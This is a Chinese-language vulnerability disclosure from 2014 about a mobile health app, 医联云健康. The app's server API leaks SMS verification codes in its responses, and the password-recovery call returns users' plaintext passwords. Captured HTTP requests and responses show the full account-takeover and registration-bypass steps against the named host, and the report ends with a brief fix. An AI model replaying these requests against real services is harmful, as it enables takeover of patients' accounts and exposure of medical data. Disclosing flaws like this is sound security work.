2014-09-22: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-11-06: 厂商已经主动忽略漏洞,细节向公众公开
APP好像很难查找开发商,提供已知信息问题APP名:医联云健康APP下载地址:http://apk.91.com/Soft/Android/cn.zgjkw.ydyl.dz-4.html短信联系方:泰福健康http://www.taivex.org/问题画面一:忘记密码忘记密码时先输入手机号,然后取得验证码,通过验证后,短信通知密码问题:只要暴力推测出用户手机号,可以通过抓包取得验证码和登录密码问题画面二:注册注册时需要输入手机验证码问题:可以通过抓包取得验证码
问题画面一:忘记密码
输入手机号,取得验证码
发现response已经有验证码7358:
GET /BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...手机号省略...6 HTTP/1.1Host: ylyjk.taivex.org:81...省略...HTTP/1.1 200 OK...省略...{"code":"0","data":{"checkcode":"7358"},"header":{"action":"GetMobileCheckCode","errreason":"","requestseq":"0"}}
输入
送信得到密码wooyun8899:
GET /BSoftNew.svc/GetUserPasswordByCheckCode?messagetype=1&checkcode=7358&mobile=156...手机号省略...6 HTTP/1.1Host: ylyjk.taivex.org:81...省略...HTTP/1.1 200 OKCache-Control: privateContent-Length: 126Content-Type: text/plainServer: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 22 Sep 2014 05:59:58 GMT{"code":"0","data":{"password":"wooyun8899"},"header":{"action":"GetUserPasswordByCheckCode","errreason":"","requestseq":"0"}}
登录成功
GET /BSoftNew.svc/Login?username=156...省略...6&DevID=8...省略...0&OS=2&logintype=2&DevType=GT-I9128E&ClientVer=1.2.2&password=wooyun8899&DevVer=4.2.2 HTTP/1.1Host: ylyjk.taivex.org:81...省略...HTTP/1.1 200 OK...省略...{"code":"0","data":{"token":"...省略...","usertype":"2","stunumber":"","stucode":"","mobile":"156...省略...6","userkey":"","ver":"1.0","sn":"0...省略...2","psn":"0...省略...2","name":"æ³°ç¦å»è","hoscode":"","squcode":"","hisucode":"","servercurticks":"1...省略...4","idcard":"","realname":"156...省略...6","logo":"","sex":"","sign":"156...省略...6","cardnumber":"","birthday":"","header":"","medicalcard":"","outpatientcard":"","patientid":"9...省略...2","username":"156...省略...6","orgcode":"0...省略...8","password":"wooyun8899","userid":"2...省略...8","appmodule":""},"header":{"action":"Login","errreason":"","requestseq":"0","servercurticks":"1...省略...4"}}
问题画面二:注册
点注册后直接在response里得到验证码,绕过手机了。。
GET /BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...手机号省略...7 HTTP/1.1Host: ylyjk.taivex.org:81...省略...HTTP/1.1 200 OK...省略...{"code":"0","data":{"checkcode":"5821"},"header":{"action":"GetMobileCheckCode","errreason":"","requestseq":"0"}}
输入验证码:
注册成功:
GET /BSoftNew.svc/AddMobileUser?password=pentest&checkcode=5821&mobile=156...手机号省略...7 HTTP/1.1Host: ylyjk.taivex.org:81...省略...HTTP/1.1 200 OK...省略...{"code":"0","data":{},"header":{"action":"AddMobileUser","errreason":"","requestseq":"0"}}
同上
不要把验证码、密码显示在请求响应中。
未能联系到厂商或者厂商积极拒绝